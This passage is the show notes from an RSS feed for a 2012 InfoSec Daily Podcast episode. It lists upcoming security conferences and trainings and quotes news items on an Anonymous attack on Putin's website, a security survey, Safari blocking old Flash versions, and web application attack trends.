<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">GraniteSec (formerly The New England InfoSec Tweetup)<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;May 19, 2012&nbsp;&nbsp;&nbsp; <br class="kix-line-break" /><br />
	Where: &nbsp;Veasey Memorial Park, Groveland, MA<br class="kix-line-break" /><br />
	</span><a href="http://granitesec.org"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://granitesec.org</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012<br class="kix-line-break" /><br />
	Where: MU Forensic Science Center &#8211; Huntington, West Virginia<br class="kix-line-break" /><br />
	</span><a href="http://www.appyide.org/"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.appyide.org/</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">LayerOne 2012<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 26-27, 2012<br class="kix-line-break" /><br />
	Where: Clarion Hotel &#8211; Anaheim, CA<br class="kix-line-break" /><br />
	</span><a href="http://www.layerone.org/"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.layerone.org</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Security 504: Hacker Techniques, Exploits &amp; Incident Handling &#8211; Matt Romanek<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: June 20 &#8211; 27, 2012<br class="kix-line-break" /><br />
	Where: Courtyard Seattle Federal Way, WA <br class="kix-line-break" /><br />
	</span><a href="http://www.sans.org/mentor/details.php?nid=28014"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=28014</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Social Engineering Training</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21-24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: August 20-24, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Bristol, UK</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;November 12-16, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Columbia, MD<br class="kix-line-break" /><br />
	</span><a href="http://www.social-engineer.com/social-engineer-training"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.com/social-engineer-training</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Inside and Out of the Social-Engineer Toolkit (SET)<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21 &#8211; 22, 2012<br class="kix-line-break" /><br />
	When: July 23 &#8211; 24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas<br class="kix-line-break" /><br />
	</span><a href="http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; The &ldquo;Deuce&rdquo; Reunion<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012<br class="kix-line-break" /><br />
	Where: Louisville, KY<br class="kix-line-break" /><br />
	</span><a href="http://www.derbycon.com/"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Hack3rCon^3</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: October 19-21, 2012</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Charleston, WV <br class="kix-line-break" /><br />
	</span><a href="http://hack3rcon.org/"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://hack3rcon.org/</span></a><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Skydogcon<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: October 26-28<br class="kix-line-break" /><br />
	Where: Hotel Preston in Nashville, TN <br class="kix-line-break" /><br />
	</span><a href="http://www.skydogcon.com"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.skydogcon.com</span></a><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;">&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><img height="517px;" src="https://lh6.googleusercontent.com/o28b4e0pedHPW773Cq3rZMQYjowWXWAtEpDASfgLzmoqPCP-wvKYwN2k008UiyjkVVqw8Y_ApdGzWdTbFPDzQbJ1PPdAjFEOixfQuYc0nVpsDHig6PU" width="403px;" /></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;">&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon &ldquo;Dropping the Deuce&rdquo; courtesy of @jx666jx</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;">&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &nbsp;</span><a href="http://www.tgdaily.com/security-features/63303-anonymous-takes-on-putins-russian-kremlin"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.tgdaily.com/security-features/63303-anonymous-takes-on-putins-russian-kremlin</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Cyber activists associated with the Anonymous collective temporarily downed President Vladimir Putin&#39;s web site on Wednesday.  </span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The activists said they were protesting the controversial renewal of Putin&#39;s presidential term for yet another six years, which has sparked a wave of demonstrations in Moscow&#39;s city streets. </span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The Kremlin&#39;s Internet security division responded to the above-mentioned pwnage by telling </span><a href="http://www.reuters.com/article/2012/05/09/us-russia-hackers-kremlin-idUSBRE8480L020120509"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Reuters</span></a><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">: &quot;All the relevant departments are taking the necessary measures to counteract (such) attacks. </span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;This is routine work. There is always some external influence. Today we are witnessing a splash of activity (by the attackers) &#8230; (But) they failed to achieve their goal.&quot;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In other Anonymous related news, the Pirate Bay has gone on record as criticizing Anonymous for taking down the Virgin Media website over its blocking of the Pirate Bay file sharing site, as per a recent order from the U.K. High Court .</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;We do NOT encourage these actions. We believe in the open and free Internets, where anyone can express their views. Even if we strongly disagree with them and even if they hate us,&quot; The Pirate Bay wrote on its Facebook page.  </span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">But @AnonAteam defended its decision to target the Bay. </span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;The attacks are not simply about facilitating access to the Pirate Bay website but to stop the type of order used to block your website being used as a precedent for further censorship on the Internet,&quot; AnonAteam wrote on Tumblr.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;The entire reason for the protest is to protect freedom of expression from being blocked without any form of judicial process. ISPs are the gateways to democracy in this technology age, to censor access to websites with such an abuse of the legal process, outside parliament our a Humans Right court is unlaw and an abuse of power.&quot;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://reports.informationweek.com/abstract/21/8815/Security/research-2012-strategic-security-survey.html"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://reports.informationweek.com/abstract/21/8815/Security/research-2012-strategic-security-survey.html</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">More than 900 IT and security professionals responded to InformationWeek&rsquo;s 2012 Strategic Security Survey. Our results cover a variety of areas critical to information risk management, including cloud, mobility and software development.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">On the mobile device front, a full quarter of respondents say smartphones and tablets represent a significant threat to security. Loss or theft is IT&rsquo;s greatest concern when it comes to mobile devices, a result unchanged from 2011.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">It&rsquo;s clear from our survey that organizations today take cloud security much more seriously than in the past. The percentage of respondents who conduct their own risk assessments of cloud providers jumped to 29% this year, from 18% in 2011. Even better news is that the percentage of companies that don&rsquo;t bother with a risk assessment dropped by almost half compared to 2011. </span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The report drills into data on secure software development. This is an important component of a risk management practice because flaws and defects in software can be exploited by attackers. One recommendation is for organizations to invest in a secure software development life cycle. Only a third of our 946 respondents do so. That&rsquo;s a number that needs to grow. For those that do use a secure SDLC, 33% rate it to be very effective.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">This year&rsquo;s report also delves into why you should pay more attention to access controls, the importance of user education, the benefits of collecting and analyzing security metrics, and the usefulness (or lack thereof) of cyber-breach insurance.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.computerworld.com/s/article/9227067/Adobe_s_security_chief_praises_Apple_for_Flash_crippling_move"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.computerworld.com/s/article/9227067/Adobe_s_security_chief_praises_Apple_for_Flash_crippling_move</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Adobe&#39;s head of security yesterday applauded Apple&#39;s move to block outdated versions of his company&#39;s Flash Player.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;We welcome today&#39;s initiative by Apple to encourage Mac users to stay up-to-date,&quot; said Brad Arkin, Adobe&#39;s senior director of security, products and services, in a post to the company&#39;s </span><a href="http://blogs.adobe.com/asset/2012/05/working-together-on-keeping-our-mutual-customers-up-to-date.html"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">secure engineering blog</span></a><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Arkin was referring to Wednesday&#39;s update of Safari, Apple&#39;s browser, that patched four vulnerabilities and instituted a new feature that pulls out-of-date copies of Flash Player from the system, forcing users who want to view Flash content to upgrade to the current version of the browser plug-in.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Safari 5.1.7, which runs on OS X Snow Leopard and Lion, as well as on Windows XP, Vista and Windows 7, cripples any copy of Flash older than 10.1.102.64, which shipped in November 2010.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Safari alerts the user, then points him or her to Adobe&#39;s download site, where the latest version of Flash Player is available.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;A thank you to the security team at Apple for working with us to help protect our mutual customers,&quot; Arkin added.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Arkin&#39;s appreciation for Safari&#39;s Flash blocking stood in contrast to past disputes between Apple and Adobe over the media player.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In 2010, former Apple CEO Steve Jobs trashed Flash as unsuitable for mobile devices because it was slow, drained batteries and posed security problems.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.computerweekly.com/news/2240150047/Cyber-attackers-increasingly-targeting-applications-research-shows"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.computerweekly.com/news/2240150047/Cyber-attackers-increasingly-targeting-applications-research-shows</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Web and mobile applications are the new frontiers in the war against cyber attack, according to the latest </span><a href="http://www.hpenterprisesecurity.com/cybersecurityrisks"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">top cyber security risks report</span></a><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> from Hewlett Packard.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The report reveals that SQL injection (SQLi) attacks on web applications have increased sharply from around 15 million in 2010 to more than 50 million in 2011.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In 2011, SQLi attacks represented the most popular technique used against web applications, with three times as many SQLi attacks than PHP file inclusion and cross-site scripting attacks combined.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;Good software should not introduce security vulnerabilities, yet 86% of web applications analysed had some kind of vulnerability,&quot; said Simon Leech, presales director, HP Enterprise Security.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Web application vulnerabilities account for 36% of all vulnerabilities, the report said, exacerbated by customisation and add-ons.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Static analysis revealed simple coding mistakes result in significant numbers of vulnerabilities, with 54% containing cross-site scripting flaws and 86% containing injection flaws.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;While not all code level vulnerabilities will be attacked, these can result in loss of compliancy or data sharing that can fuel attacks in other areas,&quot; the report said.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Dynamic analysis of the web applications in use showed 74% were vulnerable to cross-site scripting attacks and 12% were vulnerable to injection flaws.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The report said that while these numbers are smaller, they are not less risky, as vulnerabilities are difficult to detect and defend against without hindering business.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">[end]</span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-666-no-devil-here-vladimir-putin-informationweek-2012-strategic-security-survey-flash-crippling-targeting-applications/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3929/0/infosec-daily-podcast-episode-666.mp3" length="21677708" type="audio/mpeg" />
		<itunes:duration>0:45:09</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 666 for May 11, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, and Geordy Rostad.
&#160;
Announcements
GraniteSec (formerly The New England InfoSec Tweetup)
	When: &#160;M[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 666 for May 11, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, and Geordy Rostad.
&#160;
Announcements
GraniteSec (formerly The New England InfoSec Tweetup)
	When: &#160;May 19, 2012&#160;&#160;&#160; 
	Where: &#160;Veasey Memorial Park, Groveland, MA
	http://granitesec.org
&#160;
AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center &#8211; Huntington, West Virginia
	http://www.appyide.org/
&#160;
LayerOne 2012
	When: May 26-27, 2012
	Where: Clarion Hotel &#8211; Anaheim, CA
	http://www.layerone.org
&#160;
Security 504: Hacker Techniques, Exploits &#38; Incident Handling &#8211; Matt Romanek
	When: June 20 &#8211; 27, 2012
	Where: Courtyard Seattle Federal Way, WA 
	http://www.sans.org/mentor/details.php?nid=28014
&#160;
Social Engineering Training
When: July 21-24, 2012
	Where: Black Hat Vegas
When: August 20-24, 2012
	Where: &#160;Bristol, UK
When: &#160;November 12-16, 2012
	Where: &#160;Columbia, MD
	http://www.social-engineer.com/social-engineer-training
&#160;
Inside and Out of the Social-Engineer Toolkit (SET)
	When: July 21 &#8211; 22, 2012
	When: July 23 &#8211; 24, 2012
	Where: Black Hat Vegas
	http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html
&#160;
